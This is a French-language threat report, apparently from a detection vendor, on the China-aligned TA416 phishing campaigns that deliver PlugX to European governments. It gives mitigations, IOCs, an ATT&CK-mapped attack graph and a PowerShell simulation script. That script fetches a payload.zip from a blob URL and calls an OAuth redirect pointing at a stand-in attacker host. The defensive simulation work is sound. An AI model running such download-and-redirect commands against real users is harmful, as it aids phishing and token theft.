Je reviendrais en courant vers l’UE : TA416 reprend ses campagnes d’espionnage contre les gouvernements européens

Ruslan Mikhalov Chef de la Recherche sur les Menaces chez SOC Prime

Suivre

Je reviendrais en courant vers l’UE : TA416 reprend ses campagnes d’espionnage contre les gouvernements européens

Detection stack

AIDR
Alert
ETL
Query

Rapport
Flux d'Attaque
Détections
Simulations

Résumé

TA416, un acteur menaçant aligné sur la Chine, a relancé ses attaques contre les entités gouvernementales et diplomatiques européennes à la mi-2025 après une période d’activité réduite. L’acteur combine la reconnaissance légère via des balises web et la livraison d’un cheval de Troie PlugX personnalisé, en alternant les chaînes d’accès initiales incluant des leurres de type Cloudflare Turnstile, des abus de redirection OAuth, et des téléchargeurs pilotés par MSBuild. D’ici mars 2026, les rapports indiquent que le même plan s’élargit aux cibles diplomatiques du Moyen-Orient en raison des tensions régionales croissantes liées à l’Iran. Les campagnes s’appuient sur des boîtes aux lettres compromises, des binaires Windows signés pour le chargement de DLL, et une infrastructure de commande et de contrôle à rotation rapide.

Enquête

Proofpoint a suivi plusieurs vagues de spear-phishing envoyées depuis des adresses freemail et des comptes gouvernementaux compromis, utilisant soit des pixels de suivi soit des archives armées. Les chaînes basées sur les archives utilisaient le transport dissimulé de ZIP avec des artefacts LNK pour mettre en scène des MSIs ou des packages TAR, qui lançaient ensuite des exécutables signés pour charger PlugX. En parallèle, TA416 a abusé des redirections OAuth de Microsoft Entra ID et a utilisé des binaires MSBuild renommés associés à des fichiers de projet C# malveillants pour récupérer et exécuter des charges utiles. Un trafic C2 a été observé sur HTTP avec des messages cryptés en RC4 et des modèles d’en-tête/cookie distincts utilisés pour façonner les requêtes et les réponses.

Atténuation

Imposez une authentification forte des emails et renforcez les contrôles autour du contenu entrant provenant de fournisseurs de stockage cloud inconnus. Surveillez l’exécution suspecte de binaires signés couramment abusés pour le chargement de DLL (par exemple, cnmpaui.exe et steam_monitor.exe) et alertez sur un comportement de recherche d’ordonnancement de DLL anormal. Ajoutez des détections pour les signatures HTTP d’en-têtes ou de cookies inhabituelles associées à des C2 cryptés, et bloquez les domaines/IP connus de TA416 dans la mesure du possible. Renforcez la surveillance des points de terminaison pour la persistance de clé de Run nouvellement créée et les écritures de fichiers inattendues dans les répertoires publics ou partagés.

Réponse

Si une activité est détectée, isolez l’hôte, capturez la mémoire volatile et préservez les journaux pertinents des points de terminaison et de la messagerie pour le périmètre. Recherchez les artefacts PlugX, y compris le chargeur CNCLID.dll, le code shell Canon.dat et le mutex dGcEuQhKT. Révoquez l’accès aux comptes de messagerie compromis, réinitialisez les identifiants et supprimez toute tâche planifiée ou autre mécanisme de persistance. Analysez la télémétrie réseau concernant les signaux HTTP chiffrés en RC4, puis bloquez les domaines/URLs associés et élargissez la chasse dans l’ensemble de l’environnement.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["Action – T1566 Hameçonnage: Emails de phishing envoyés depuis des comptes compromis et phishing générique. Les destinataires cliquent sur des liens malveillants."] class action_initial_access action tool_phishing_email["Outil – Nom: Email de Phishing Technique: T1566"] class tool_phishing_email tool action_user_execution["Action – T1204 Exécution de l’utilisateur: Les victimes cliquent sur une URL malveillante menant à un téléchargement ZIP malveillant."] class action_user_execution action tool_malicious_zip["Outil – Nom: Archive ZIP malveillante contenant un raccourci LNK"] class tool_malicious_zip tool action_lnk_smuggling["Action – T1027.012 Transport d’Icône LNK: Le raccourci LNK exécute un script PowerShell."] class action_lnk_smuggling action process_powershell["Processus – Exécution de PowerShell pour extraire le binaire signé"] class process_powershell process tool_signed_binary["Outil – Nom: cnmpaui.exe (binaire légitime signé)"] class tool_signed_binary tool action_dll_sideloading["Action – T1218 Exécution de Proxy de Binaire Système: Le chargement de DLL charge une DLL malveillante."] class action_dll_sideloading action malware_malicious_dll["Malware – DLL malveillante chargée via chargement de DLL"] class malware_malicious_dll malware action_msbuild_execution["Action – T1127.001 Exécution de Proxy des Utilitaires Développeur de Confiance: MSBuild utilisé pour télécharger et exécuter PlugX."] class action_msbuild_execution action tool_msbuild["Outil – Nom: Exécutable MSBuild renommé"] class tool_msbuild tool tool_csharp_project["Outil – Nom: Fichier de projet C# malveillant"] class tool_csharp_project tool malware_plugx["Malware – Charge utile PlugX"] class malware_plugx malware action_persistence["Action – T1037.001 Persistance via clé de registre Run et modification de raccourci."] class action_persistence action process_registry["Processus – Création de clé de registre Run sous HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["Action – T1553.002 Subversion des Contrôles de Confiance: Abus d’exécutables signés et forte obfuscation."] class action_defense_evasion action action_apddomain_hijack["Action – T1574.014 Détournement du Flux d’Exécution: Détournement AppDomainManager via chaîne MSBuild"] class action_apddomain_hijack action action_c2["Action – T1071.001 Protocoles Web et T1573.001 Canal Chiffré: C2 HTTP avec cryptage RC4"] class action_c2 action process_c2_communication["Processus – Communication HTTP chiffrée avec le serveur C2"] class process_c2_communication process action_exfiltration["Action – T1041 Exfiltration sur le canal C2: Données envoyées via un canal chiffré"] class action_exfiltration action %% Connections action_initial_access –>|livre| tool_phishing_email tool_phishing_email –>|contient un lien menant à| action_user_execution action_user_execution –>|télécharge| tool_malicious_zip tool_malicious_zip –>|contient| action_lnk_smuggling action_lnk_smuggling –>|exécute| process_powershell process_powershell –>|extrait| tool_signed_binary tool_signed_binary –>|charge| action_dll_sideloading action_dll_sideloading –>|charge| malware_malicious_dll malware_malicious_dll –>|prépare l’environnement pour| action_msbuild_execution action_msbuild_execution –>|utilise| tool_msbuild tool_msbuild –>|traite| tool_csharp_project tool_csharp_project –>|télécharge et exécute| malware_plugx malware_plugx –>|crée| action_persistence action_persistence –>|écrit| process_registry action_persistence –>|modifie le raccourci pour| action_lnk_smuggling action_persistence –>|active| action_defense_evasion action_defense_evasion –>|applique| action_apddomain_hijack action_apddomain_hijack –>|active| action_c2 action_c2 –>|communique via| process_c2_communication process_c2_communication –>|exfiltre des données via| action_exfiltration "

Flux d’attaque

Narration d’Attaque & Commandes :
1. Mettre en scène la charge utile : L’attaquant télécharge un fichier ZIP malveillant (payload.zip) dans le conteneur Azure Blob mydownload.z29.web.core.windows.net.
2. Créer une page leurre : Une page HTML malveillante hébergée sur le même domaine inclut une <img> balise qui pointe vers l’URL Azure Blob (déclenchant le téléchargement) and un <iframe> caché qui redirige immédiatement la victime vers un point d’extrémité d’autorisation OAuth 2.0 de Microsoft Entra ID avec un redirect_uri pointant vers le domaine contrôlé par l’attaquant.
3. Interaction de la victime : La victime visite la page leurre (par ex., via un email de phishing). Le navigateur émet deux requêtes HTTP GET en succession rapide — une pour l’URL Blob et une pour l’URL OAuth. Les Journaux d’Activité Azure enregistrent les deux requêtes sous la même session proxy, satisfaisant la sélection_blob AND sélection_oauth condition de la règle.

Script de Test de Régression : (exécuté depuis la machine de la victime pour reproduire la télémétrie)

# Simulation du déclencheur TA416 Azure Blob + OAuth
# Etape 1 : Télécharger le blob malveillant (simulé avec un fichier bénin)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# Etape 2 : Invoque immédiatement l'URL d'autorisation OAuth (redirection simulée)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "Simulation complète – les deux URLs ont été requises."

Commandes de Nettoyage :

# Supprimer le fichier téléchargé
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# Effacer les variables de session PowerShell
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

Rejoignez la plateforme Detection as Code de SOC Prime pour améliorer la visibilité sur les menaces les plus pertinentes pour votre entreprise. Pour vous aider à démarrer et à générer une valeur immédiate, planifiez dès maintenant une réunion avec des experts de SOC Prime.

Rejoindre gratuitement